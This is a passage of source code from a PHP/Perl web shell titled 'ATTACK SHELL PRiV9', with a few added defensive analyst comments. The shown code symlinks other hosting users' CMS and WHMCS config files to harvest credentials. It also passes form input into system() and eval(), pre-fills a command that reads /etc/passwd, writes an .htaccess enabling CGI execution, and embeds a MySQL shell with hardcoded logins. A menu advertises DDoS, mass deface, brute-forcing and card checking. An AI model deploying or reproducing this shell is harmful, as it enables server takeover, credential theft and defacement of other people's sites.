139 symlink('/home/'.$user.'/public_html/forum/SSI.php',$kola.'- C M F - forum.txt') ;
140 symlink('/home/'.$user.'/public_html/inc/config.php',$kola.'- MyBB.txt') ;
141 symlink('/home/'.$user.'/public_html/forum/inc/config.php',$kola.'- MyBB - forum.txt') ;
142 symlink('/home/'.$user.'/public_html/config.php',$kola.'- Other.txt') ;
143 symlink('/home/'.$user.'/public_html/lib/config.php',$kola.'- Balitbang.txt') ;
144 symlink('/home/'.$user.'/public_html/client/configuration.php',$kola.'-clients.txt') ;
145 symlink('/home/'.$user.'/public_html/clients/configuration.php',$kola.'-client.txt') ;
146 symlink('/home/'.$user.'/public_html/billing/configuration.php',$kola.'-billing.txt') ;
147 symlink('/home/'.$user.'/public_html/billings/configuration.php',$kola.'-billings.txt') ;
148 symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$kola.'- whmcs - whmcs.txt') ;
149 symlink('/home/'.$user.'/public_html/whm/configuration.php',$kola.'- whm - whm.txt');
150 symlink('/home/'.$user.'/public_html/forum/includes/config.php',$kola.'- VBulletin - forum.txt');
151 symlink('/home/'.$user.'/public_html/forum/config.php',$kola.' - PhpBB - forum.txt') ;
152 symlink('/home/'.$user.'/public_html/whmc/configuration.php',$kola.'- whmc - whmc.txt');
153 symlink('/home/'.$user.'/public_html/submitticket.php',$kola.' - whmcs2.txt');
154 symlink('/home/'.$user.'/public_html/manage/configuration.php',$kola.' -mangewhmcs.txt');
155 symlink('/home/'.$user.'/public_html/myshop/configuration.php',$kola.' -myshop.txt');
156 symlink('/home/'.$user.'/public_html/support/configuration.php',$kola.'-support.txt');
157 symlink('/home/'.$user.'/public_html/supports/configuration.php',$kola.'-supports.txt');
158 symlink('/home/'.$user.'/public_html/oscommerce/includes/configure.php',$kola.'-oscommerce.txt');
159 symlink('/home/'.$user.'/public_html/oscommerces/includes/configure.php',$kola.'-oscommerces.txt');
160 symlink('/home/'.$user.'/public_html/shopping/includes/configure.php',$kola.'-shop-shopping.txt');
161 symlink('/home/'.$user.'/public_html/sale/includes/configure.php',$kola.'-sale.txt');
162 symlink('/home/'.$user.'/public_html/amember/config.inc.php',$kola.'-amember.txt');
163 symlink('/home/'.$user.'/public_html/config.inc.php',$kola.'-amember2.txt');
164 symlink('/home/'.$user.'/public_html/wp/wp-config.php',$kola.'- wordpress - wp.txt');
165 symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$kola.'- wwordpress - wp - beta.txt');
166 symlink('/home/'.$user.'/public_html/beta/wp-config.php',$kola.'- wordpress - beta.txt');
167 symlink('/home/'.$user.'/public_html/press/wp-config.php',$kola.'-wp13-press.txt');
168 symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$kola.'- wordpress -wordpress.txt');
169 symlink('/home/'.$user.'/public_html/wordpress/beta/wp-config.php',$kola.'- wordpress - wordpress-beta.txt');
170 symlink('/home/'.$user.'/public_html/news/wp-config.php',$kola.'- wordpress -news.txt');
171 symlink('/home/'.$user.'/public_html/new/wp-config.php',$kola.'- wordpress - new.txt');
172 symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$kola.'- wordpress - blogs.txt');
173 symlink('/home/'.$user.'/public_html/home/wp-config.php',$kola.'- wordpress - home.txt');
174 symlink('/home/'.$user.'/public_html/protal/wp-config.php',$kola.'- wordpress - protal.txt');
175 symlink('/home/'.$user.'/public_html/site/wp-config.php',$kola.'- wordpress - site.txt');
176 symlink('/home/'.$user.'/public_html/main/wp-config.php',$kola.'- wordpress - main.txt');
177 symlink('/home/'.$user.'/public_html/test/wp-config.php',$kola.'- wordpress - test.txt');
178 symlink('/home/'.$user.'/public_html/joomla/configuration.php',$kola.'-joomla - joomla .txt');
179 symlink('/home/'.$user.'/public_html/protal/configuration.php',$kola.'- joomla - protal.txt');
180 symlink('/home/'.$user.'/public_html/joo/configuration.php',$kola.'- joomla - joo.txt');
181 symlink('/home/'.$user.'/public_html/cms/configuration.php',$kola.'- joomla - cms.txt');
182 symlink('/home/'.$user.'/public_html/site/configuration.php',$kola.'- joomla - site.txt');
183 symlink('/home/'.$user.'/public_html/main/configuration.php',$kola.'- joomla - main.txt');
184 symlink('/home/'.$user.'/public_html/news/configuration.php',$kola.'- joomla - news.txt');
185 symlink('/home/'.$user.'/public_html/new/configuration.php',$kola.'- joomla - new.txt');
186 symlink('/home/'.$user.'/public_html/home/configuration.php',$kola.'- joomla - home.txt');
187 symlink('/home/'.$user.'/public_html/vb/includes/config.php',$kola.'- vb.txt');
188 symlink('/home/'.$user.'/public_html/vb3/includes/config.php',$kola.'- vb3.txt');
189 symlink('/home/'.$user.'/public_html/cpanel/configuration.php',$kola.'-cpanel.txt');
190 symlink('/home/'.$user.'/public_html/panel/configuration.php',$kola.'-panel.txt');
191 symlink('/home/'.$user.'/public_html/host/configuration.php',$kola.'-host.txt');
192 symlink('/home/'.$user.'/public_html/hosting/configuration.php',$kola.'-hosting.txt');
193 symlink('/home/'.$user.'/public_html/hosts/configuration.php',$kola.'-hosts.txt');
194 symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$kola.'-zencart.txt');
195 symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$kola.'- zencart - shop.txt');
196 symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$kola.'-shop-ZCshop.txt');
197 symlink('/home/'.$user.'/public_html/Settings.php',$kola.'- smf.txt');
198 symlink('/home/'.$user.'/public_html/smf/Settings.php',$kola.'- smf - smf.txt');
199 symlink('/home/'.$user.'/public_html/forum/Settings.php',$kola.'- smf - forum.txt');
200 symlink('/home/'.$user.'/public_html/forums/Settings.php',$kola.'- smf - forums.txt');
201 symlink('/home/'.$user.'/public_html/upload/includes/config.php',$kola.'- upload .txt');
202 symlink('/home/'.$user.'/public_html/incl/config.php',$kola.'- malay.txt');
203 symlink('/home/'.$user.'/public_html/config/koneksi.php',$kola.'- lokomedia.txt');
204 symlink('/home/'.$user.'/system/sistem.php',$kola.'- lokomedia.txt');
205 }
206if ($ENV{'REQUEST_METHOD'} eq 'POST') {
207 read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
208} else {
209 $buffer = $ENV{'QUERY_STRING'};
210}
211@pairs = split(/&/, $buffer);
212foreach $pair (@pairs) {
213 ($name, $value) = split(/=/, $pair);
214 $name =~ tr/+/ /;
215 $name =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
216 $value =~ tr/+/ /;
217 $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
218 $FORM{$name} = $value;
219}
220if ($FORM{pass} eq ""){
221print '
222<body class="newStyle1">
223<p> </p>
224<form method="post">
225<textarea name="pass" style="width: 543px; height: 400px"></textarea>
226<br /><br />
227<input name="tar" type="text" style="width: 212px" /><br /><br />
228<input name="Submit1" type="submit" value="Hajar ..!" style="width: 99px" />
229<br />
230</form>';
231}else{
232@lines =<$FORM{pass}>;
233$y = @lines;
234open (MYFILE, ">tar.tmp");
235print MYFILE "tar -czf ".$FORM{tar}.".tar ";
236for ($ka=0;$ka<$y;$ka++){
237while(@lines[$ka] =~ m/(.*?):x:/g){
238&lil($1);
239print MYFILE $1.".txt ";
240for($kd=1;$kd<18;$kd++){
241print MYFILE $1.$kd.".txt ";
242}
243}
244 }
245print'<body class="newStyle1">
246<p>Done !!</p>
247<p> </p>';
248if($FORM{tar} ne ""){
249open(INFO, "tar.tmp");
250@lines =<INFO> ;
251close(INFO);
252system(@lines);
253print'<p><a href="'.$FORM{tar}.'.tar"> download file</a></p>';
254}
255}
256 print"
257</body>
258</html>";'; ?>
259<html><head><link href='hxxp://www.iwallhd.com/stock/lion-black-background-free-wallpapers.jpg' rel='icon' type='image/gif'><script language='JavaScript'>
260var txt="ATTACK SHELL PRiV9 ";
261var kecepatan=120;var segarkan=null;function bergerak() { document.title=txt;
262txt=txt.substring(1,txt.length)+txt.charAt(0);
263segarkan=setTimeout("bergerak()",kecepatan);}bergerak();
264</script>
265<link href='hxxp://fonts.googleapis.com/css?family=Roboto:400,300,400italic,500,700%7CRopa+Sans%7COswald' rel='stylesheet' type='text/css'/>
266<script type="text/javascript">
// UI helper: hides the element whose id is `lama` and shows the element whose id is `baru`.
// Both ids are looked up with getElementById; a missing id would throw, as there is no null check.
267function tukar(lama,baru){
268 document.getElementById(lama).style.display = 'none';
269 document.getElementById(baru).style.display = 'block';
270}
271</script>
272<style type="text/css">
273body{
274 background:#000000;;
275}
276a {
277text-decoration:none;
278}
279a:hover{
280border-bottom:1px solid #FF0000;
281}
282*{
283 font-size:11px;
284 font-family:Tahoma,Verdana,Arial;
285 color:#FFFFFF;
286}
287#menu{
288 background:none;
289 margin:8px 2px 4px 2px;
290}
291.menu a{
292background-color:#CCFF00;
293 display:inline-block;
294 position:relative;
295 margin:30px 5px;
296 border:1px solid #FFFFFF;
297 padding:20px 20px 20px 80px;
298 color:#fff;
299 transition:all 0.4s ease
300}
301
302.menu a:hover{
303 background:#2c3e50
304}
305.tabnet{
306 margin:15px auto 0 auto;
307 border: 1px solid #CCCC00;
308}
309.main {
310 width:100%;
311 box-shadow: inset 0 -1px 0 rgba(48, 48, 48, 0.7), 0 2px 4px rgba(48, 48, 48, 0.7);
312}
313.gaya {
314 color: #FF0000;
315}
316.inputz{
317 background:#000000;
318 border:0;
319 padding:2px;
320 border-bottom:1px solid #FFFFFF;
321 border-top:1px solid #FFFFFF;
322}
323.inputzbut{
324 background:#000000;
325 color:#FFFFFF;
326 margin:0 4px;
327 border:2px solid #000000;
328
329}
330.inputz:hover,{
331 border-bottom:1px solid #FF0000;
332 border-top:1px solid #FF0000;
333}
334.inputzbut:hover{
335border:2px solid #FFFFFF;
336}
337.output {
338 margin:auto;
339 border:1px solid #FF0000;
340 width:100%;
341 height:400px;
342 background:#000000;
343 padding:0 2px;
344}
345.cmdbox{
346 width:100%;
347}
348.head_info{
349 padding: 0 4px;
350}
351.jaya{ font-family: ;}
352
353.coli{
354 font-size:30px;
355 padding:0;
356 color:#000000;
357}
358.coli_tbl{
359 text-align:center;
360 margin:0 4px 0 0;
361 padding:0 4px 0 0;
362 border-right:2px solid #FFFFFF;
363}
364.phpinfo table{
365 width:100%;
366 padding:0 0 0 0;
367}
368.phpinfo td{
369 background:#000000;
370 color:#000000;
371padding:6px 8px;;
372}
373.phpinfo th, th{
374 background:#000000;
375 border-bottom:1px solid #CCCC00;
376font-weight:normal;
377}
378.phpinfo h2, .phpinfo h2 a{
379 text-align:center;
380 font-size:16px;
381 padding:0;
382 margin:30px 0 0 0;
383 background:#CCCC00;
384 padding:4px 0;
385}
386.explore{
387width:100%;
388}
389.explore a {
390text-decoration:none;
391}
392.explore td{
393border-bottom:2px solid #FFFFFF;
394padding:0 8px;
395line-height:24px;
396}
397.explore th{
398padding:3px 8px;
399font-weight:normal;
400background:#000000;
401border-bottom:2px solid #FFFFFF;
402}
403.explore th:hover , .phpinfo th:hover{
404border-bottom:1px solid #FF0000;
405}
406.explore tr:hover{
407background:#000000;
408}
409.viewfile{
410background:#000000;
411color:#000000;
412margin:4px 2px;
413padding:8px;
414}
415.sembunyi{
416display:none;
417padding:0;margin:0;
418}
419.btn {
420background:#000000;
421width:auto;
422height:auto;
423padding:5px;
424border:2px #FFFFFF solid;
425font-family:"oswald";
426font-size:14px;
427color:#FFFFFF;
428text-align:center;
429text-decoration:none;
430text-transform:uppercase;
431}
432.btn:hover {
433background:#FFFFFF;
434width:auto;
435height:auto;
436padding:5px;
437margin:0px;
438border:2px #000000 solid;
439font-family:"oswald";
440font-size:14px;
441color:#000000;
442text-align:center;
443text-decoration:none;
444text-transform:uppercase;
445}
446body {
447background:#FFFFFF;
448background:url("hxxp://www.iwallhd.com/stock/lion-black-background-free-wallpapers.jpg");
449}
450.header {
451background:#000000;
452width:100%;
453height:auto;
454poisition:static;top:0px;
455font-family:"Oswald";
456font-size:16px;
457color:#FFFFFF;
458border-bottom:2px solid #FFFFFF;
459padding-bottom:20px;
460box-shadow: inset 0 -1px 0 rgba(48, 48, 48, 0.7), 0 2px 4px rgba(48, 48, 48, 0.7);
461}
462/* Vn Navigasi
463-------------------------*/
464.vn-nav{
465 background:#000000;
466 width:auto;
467 padding-top:15px;
468 padding-bottom:15px;
469 font-size:14px;
470 padding-left:20px;
471 border-bottom: #000000 3px solid;
472}
473
474.vn-nav ul { margin: 0; padding: 0; list-style-type: none; list-style-image: none; }
475
476.vn-nav li { margin-right: 0px; display: inline; }
477
478.vn-nav ul li a { text-decoration:none; margin: 0px; padding: 15px 20px 15px 20px; color:#ffffff; }
479
480.vn-nav li.current-menu-item a{ color: #fff; text-decoration:none; background-color:#000000; }
481
482.vn-nav li.current_page_item { color: #fff; text-decoration:none; background-color:#000000; }
483
484/* Vn Simple Modal
485-------------------------*/
486.modalDialog {
487 position: fixed;
488 font-family: Arial, Helvetica, sans-serif;
489 top: 0;
490 right: 0;
491 bottom: 0;
492 left: 0;
493 background: rgba(0,0,0,0.8);
494 z-index: 99999;
495 opacity:0;
496 -webkit-transition: opacity 400ms ease-in;
497 -moz-transition: opacity 400ms ease-in;
498 transition: opacity 400ms ease-in;
499 pointer-events: none;
500}
501
502.modalDialog:target {
503 opacity:1;
504 pointer-events: auto;
505}
506
507.modalDialog > div {
508 width: 500px;height:auto;
509 position: relative;
510 margin: 5% auto;
511 padding: 5px 20px 13px 20px;
512 background: #34495e;color:#fff;
513}
514
515.close {
516 background: #2c3e50;
517 color: #000000;padding:5px;border-radius:0 0 12px 0;
518 line-height: 16px;
519 position: absolute;
520 right: -55px;
521 text-align: center;
522 top: 0;
523 width: 16px;
524 text-decoration: none;
525 font-weight: bold;
526}
527
528.close:hover { background: #2c3e50;color:#e74c3c }
529
530/* Vn Button
531-------------------------*/
532
533.vn-green a{
534background-color:#CCFF00;
535 display:inline-block;
536 position:relative;
537 margin:30px 5px;
538 border:1px solid #FFFFFF;
539 padding:20px 20px 20px 80px;
540 color:#fff;
541 transition:all 0.4s ease
542}
543
544.vn-green a:hover{
545 background:#2c3e50
546}
547.content{
548background:#2E2A2A;
549width:100%;
550height:auto;
551padding-bottom:10px;
552box-shadow: inset 0 -1px 0 rgba(48, 48, 48, 0.7), 0 2px 4px rgba(48, 48, 48, 0.7);
553}
554.footer{
555background:#000000;
556width:100%;
557height:auto;
558position:static;bottom:0px;
559padding-top:15px;
560padding-bottom:15px;
561font-family:"Oswald";
562font-size:10px;
563color:#FFFFFF;
564text-align:center;
565text-transform:uppercase;
566box-shadow: inset 0 -1px 0 rgba(48, 48, 48, 0.7), 0 2px 4px rgba(48, 48, 48, 0.7);
567}
568.footer:a link{
569font-family:"Oswald";
570}
571.cr {
572background:none;
573float:right;
574padding-right:15px;
575padding-top:20px;
576font-family:"Oswald";
577font-size:24px;
578color:#FFFFFF;
579text-transform:uppercase;
580}
581.cr:hover {
582background:none;
583float:right;
584padding-right:15px;
585padding-top:20px;
586font-family:"Oswald";
587font-size:24px;
588color:#000000;
589text-transform:uppercase;
590}
591.menu-wrap{
592background:#000000;
593width:100%;
594height:auto;
595padding-bottom:10px;
596box-shadow: inset 0 -1px 0 rgba(48, 48, 48, 0.7), 0 2px 4px rgba(48, 48, 48, 0.7);
597}
598</style>
599</head>
600
601
602<body onLoad="document.getElementById('cmd').focus();">
603<div class="main">
604<div class="vn-nav">
605<ul>
606 <li><a href="#openModal">About</a>
607
608<div id="openModal" class="modalDialog">
609 <div>
610 <a href="#close" title="Close" class="close">X</a>
611 <center><p><img src="hxxp://i.hizliresim.com/z4lrbR.png" width="350px" height="290px"/><br/>egyshell team are a Network Security and YouTube Vloger.<br/><br/>hacking is the art of creative problem resolving<br/></p>
612<div class="vn-green" style="text-align: center;"><a href="hxxps://www.facebook.com/r00t.info/" target="_blank">r00t.info</a> | <a href="hxxp://r00t.info" target="_blank">site</a> | <a href="hxxps://www.facebook.com/r00t.info/" target="_blank">Attack shell priv8</a></div></center>
613</div>
614</div></li>
615</ul>
616<div class="cr">lacked by r00t.info</div>
617</div>
618<div class="header">
619<div class="head_info">
620<table ><tr>
621<td><table class="coli_tbl"><tr><td><a href="?"><span class="coli"><img src="hxxp://i.hizliresim.com/z4lrbR.png" width="225" heigth="155" /></span></a></td></tr><tr><td><b></b></td></tr></table></td>
622<td><?php echo $buff; ?></td>
623</tr></table>
624</div>
625</div>
626<div class="menu-wrap">
627<div class="vn-nav">Menu</div><br/>
628<!-- menu start -->
629<center><div id="menu">
630<a class="btn" href="?<?php /* Analyst note (defensive): most menu links on this page are built the same way, a y= parameter carrying $pwd (set outside this excerpt) followed by an x= module selector. These query-string pairs are what appears in web-server access logs when the panel is used, so the x= values listed in this menu are useful log-hunting strings. */ echo "y=".$pwd; ?>">Home</a>
631<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=shell">Shell</a>
632<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=php">Eval</a>
633<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=sql">Mysql</a>
634<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=dump">Database Dump</a>
635<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=phpinfo">Php Info</a>
636<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=netsploit">Net Sploit</a>
637<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=upload">Upload</a>
638<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=mail">E-Mail</a>
639<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=sqli-scanner">SQLI Scan</a>
640<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=port-sc">Port Scan</a>
641<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=dos">DDos</a>
642<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=tool">Tools</a>
643<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=domain">Domain</a>
644<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=python">python</a>
645<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=symlink">Symlink</a>
646<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=config">Config</a>
647<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=bypass">Bypass</a><br/><br/>
648<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=cgi">CgiShell</a>
649<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=cgi2012">CGI Telnet 2012</a>
650<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=jodexer">Joomla IndChange</a>
651<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=vb">VB IndChange</a>
652<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=wp-reset">Wordpress ResPass</a>
653<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=jm-reset">Joomla ResPass</a>
654<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=whmcs">WHMCS Decoder</a>
655<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=zone">Zone-H</a>
656<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=mass">Mass Deface</a>
657<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=wpbrute">Wordpress BruteForce</a><br/><br/>
658<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=jbrute">Joomla BruteForce</a>
659<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=brute">Cpanel BruteForce</a>
660<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=bypass-cf">Bypass CloudFlare</a>
661<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=adfin">Admin Finder</a>
662<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=hash">Password Hash</a>
663<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=hashid">Hash ID</a>
664<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=string">Script Encode</a>
665<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=ccv">CC Tester</a>
666<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=whois">Website Whois</a>
667<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=music">Musicfiles</a><br/><br/>
668<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=jss">Joomla Server Scanner</a>
669<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=cms_detect">Cms Detector</a>
670<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=color">Color Tools</a>
671<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=telin">Speedtest</a>
672<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=idfinder">Facebook ID Finder</a>
673<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=schoolhos">Schoolhos</a>
674<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=whmcr">WHM Cracker</a>
675<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=rd">Root Devil Scanner</a>
676<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=dork">Dork List</a><br/><br/>
677<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=ppcheck">Paypal Checker</a>
678<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=jce">JCE Exploiter</a>
679<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=comuser">Com_user Scanner</a>
680<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=configkiller">Config File Killer</a>
681<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=spoison">Silent Poison</a>
682<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=mailbomb">Bomb Mailer</a>
683<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=whmcsploit">WHMCS Exloiter</a>
684<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=ascii">ASCII Encoder</a><br/><br/>
685<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=apache">Apache</a>
686<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=hostgator">Hostgator</a>
687<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=bluehost">Bluehost</a>
688<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=litespeed">Litespeed</a>
689<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=ovh">OVH</a>
690<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=forbidden">Forbidden</a>
691<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=phpnuke">PHP Nuke</a>
692<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=whmtool">WHMCS Tools</a>
693<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=unzip">Unzip</a>
694<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=systemview">View System</a>
695<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=traintup">Traintup</a><br/><br/>
696<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=mysqlback">Mysql Backup</a>
697<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=bind">Bindconnect</a>
698<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=security">Security</a>
699<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=shellscan">Shell Scanner</a>
700<a class="btn" href="?<?php echo $self.'gdork'?>">Dork Creator</a>
701<a class="btn" href="<?php echo $self.'?obfuscate'?>">Obfuscator</a>
702<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=logout">Log-Out</a><br/><br/>
703
704
705</div></center>
706<!-- menu end -->
707</div>
708<div class="content">
709<div class="vn-nav">Explore Like a Boss</div>
710<?php @ini_set('display_errors', 0); if(isset($_GET['x']) && ($_GET['x'] == 'php')){ ?>
711<form action="?y=<?php echo $pwd; ?>&x=php" method="post">
712<table class="cmdbox">
713<tr><td>
714<textarea class="output" name="cmd" id="cmd">
715<?php /* Analyst note (defensive): code-execution sink. When the form is submitted (submitcmd is set), the POSTed cmd field is passed through magicboom() (defined outside this excerpt) and the result is handed to eval(); whatever eval() returns is echoed into the textarea. When the form has not been submitted, the textarea is pre-filled with a sample PHP statement instead. Detection: POST requests to a script with x=php in the query string and cmd / submitcmd in the body; static scanners should flag eval() fed from $_POST. */ if(isset($_POST['submitcmd'])) { echo eval(magicboom($_POST['cmd'])); } else echo "echo file_get_contents('/etc/passwd');"; ?>
716</textarea>
717<tr><td><input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitcmd" /></td></tr></form>
718</table>
719</form>
720
721<?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'sql')) { ?>
722<form action="?y=<?php echo $pwd; ?>&x=sql" method="post">
723<?php
/* Analyst note (defensive): this branch has filesystem side effects as soon as x=sql is requested.
   It creates a directory named mysql relative to the current working directory (mode 0755),
   chdir()s into it, and overwrites .htaccess there with the two lines held in $metin:
   an Options line enabling FollowSymLinks, MultiViews, Indexes and ExecCGI, and an AddType
   line mapping the .cpc extension to a PHP handler type. The mkdir() result is not checked;
   a failed fopen() ends the request through die().
   NOTE(review): the handler name reads x-hxxpd-php here, presumably altered by the paste
   host's link defanging; confirm against a raw copy of the sample.
   Indicators to hunt for: an unexpected mysql directory inside a web root, an .htaccess
   containing an AddType entry for .cpc, and files with that extension. What is done with
   $sqlshell (assigned next) is outside this excerpt. */
echo "<center/><br/><b><font color=#FF0000>+--==[ Mysql Interface ]==--+</font></b><br><br>"; mkdir('mysql', 0755); chdir('mysql'); $akses = ".htaccess"; $buka_lah = "$akses"; $buka = fopen ($buka_lah , 'w') or die ("Error cuyy!"); $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI
724AddType application/x-hxxpd-php .cpc
725"; fwrite ( $buka , $metin ) ; fclose ($buka); $sqlshell = '<?
726$PASSWORD = "root_xhahax";
727$USERNAME = "xhahax";
728if ( function_exists('ini_get') ) {
729 $onoff = ini_get('register_globals');
730} else {
731 $onoff = get_cfg_var('register_globals');
732}
733if ($onoff != 1) {
734 @extract($hxxp_SERVER_VARS, EXTR_SKIP);
735 @extract($hxxp_COOKIE_VARS, EXTR_SKIP);
736 @extract($hxxp_POST_FILES, EXTR_SKIP);
737 @extract($hxxp_POST_VARS, EXTR_SKIP);
738 @extract($hxxp_GET_VARS, EXTR_SKIP);
739 @extract($hxxp_ENV_VARS, EXTR_SKIP);
740}
741
742function logon() {
743 global $PHP_SELF;
744 setcookie( "mysql_web_admin_username" );
745 setcookie( "mysql_web_admin_password" );
746 setcookie( "mysql_web_admin_hostname" );
747 echo "<table width=100% height=100%><tr><td><center>\n";
748 echo "<table cellpadding=2><tr><td><center>\n";
749 echo "<table cellpadding=20><tr><td><center>\n";
750 echo "<h1>MySQL Interface By S4MP4H</h1>\n";
751 echo "<form action='$PHP_SELF'>\n";
752 echo "<input type=hidden name=action value=bG9nb25fc3VibWl0>\n";
753 echo "<table cellpadding=5 cellspacing=1>\n";
754 echo "<tr><td class=\"new\">Hostname </td><td> <input type=text name=hostname value='localhost'></td></tr>\n";
755 echo "<tr><td class=\"new\">Username </td><td> <input type=text name=username></td></tr>\n";
756 echo "<tr><td class=\"new\">Password </td><td> <input type=password name=password></td></tr>\n";
757 echo "</table><p>\n";
758 echo "<input type=submit value='Enter'>\n";
759 echo "<input type=reset value='Clear'><br>\n";
760 echo "</form>\n";
761 echo "</center></td></tr></table>\n";
762 echo "</center></td></tr></table>\n";
763 echo "<p><hr width=300>\n";
764 echo "</center></td></tr></table>\n";
765}
766
767function logon_submit() {
768 global $username, $password, $hostname ,$PHP_SELF;
769 if($hostname =='')
770 $hostname = 'localhost';
771 setcookie( "mysql_web_admin_username", $username );
772 setcookie( "mysql_web_admin_password", $password );
773 setcookie( "mysql_web_admin_hostname", $hostname );
774 echo "<META hxxp-EQUIV=Refresh CONTENT='0; URL=$PHP_SELF?action=bGlzdERCcw=='>";
775}
776
777function echoQueryResult() {
778 global $queryStr, $errMsg;
779 if( $errMsg == "" ) $errMsg = "Success";
780 if( $queryStr != "" ) {
781 echo "<table cellpadding=5>\n";
782 echo "<tr><td>Query</td><td>$queryStr</td></tr>\n";
783 echo "<tr><td>Result</td><td>$errMsg</td></tr>\n";
784 echo "</table><p>\n";
785 }
786}
787
788function listDatabases() {
789 global $mysqlHandle, $PHP_SELF;
790 echo "<h1>Databases List</h1>\n";
791 echo "<form action='$PHP_SELF'>\n";
792 echo "<input type=hidden name=action value=createDB>\n";
793 echo "<input type=text name=dbname>\n";
794 echo "<input type=submit value='Create Database'>\n";
795 echo "</form>\n";
796 echo "<hr>\n";
797 echo "<table cellspacing=1 cellpadding=5>\n";
798 $pDB = mysql_list_dbs( $mysqlHandle );
799 $num = mysql_num_rows( $pDB );
800 for( $i = 0; $i < $num; $i++ ) {
801 $dbname = mysql_dbname( $pDB, $i );
802 echo "<tr>\n";
803 echo "<td>$dbname</td>\n";
804 echo "<td><a href='$PHP_SELF?action=listTables&dbname=$dbname'>Tables</a></td>\n";
805 echo "<td><a href='$PHP_SELF?action=dropDB&dbname=$dbname' onClick=\"return confirm('Drop Database \'$dbname\'?')\">Drop</a></td>\n";
806 echo "<td><a href='$PHP_SELF?action=dumpDB&dbname=$dbname' onClick=\"return confirm('Dump Database \'$dbname\'?')\">Dump</a></td>\n";
807 echo "</tr>\n";
808 }
809 echo "</table>\n";
810}
811
812function createDatabase() {
813 global $mysqlHandle, $dbname, $PHP_SELF;
814 mysql_create_db( $dbname, $mysqlHandle );
815 listDatabases();
816}
817
818function dropDatabase() {
819 global $mysqlHandle, $dbname, $PHP_SELF;
820 mysql_drop_db( $dbname, $mysqlHandle );
821 listDatabases();
822}
823
824function listTables() {
825 global $mysqlHandle, $dbname, $PHP_SELF;
826 echo "<h1>Tables List</h1>\n";
827 echo "<p class=location>$dbname</p>\n";
828 echoQueryResult();
829 echo "<form action='$PHP_SELF'>\n";
830 echo "<input type=hidden name=action value=createTable>\n";
831 echo "<input type=hidden name=dbname value=$dbname>\n";
832 echo "<input type=text name=tablename>\n";
833 echo "<input type=submit value='Create Table'>\n";
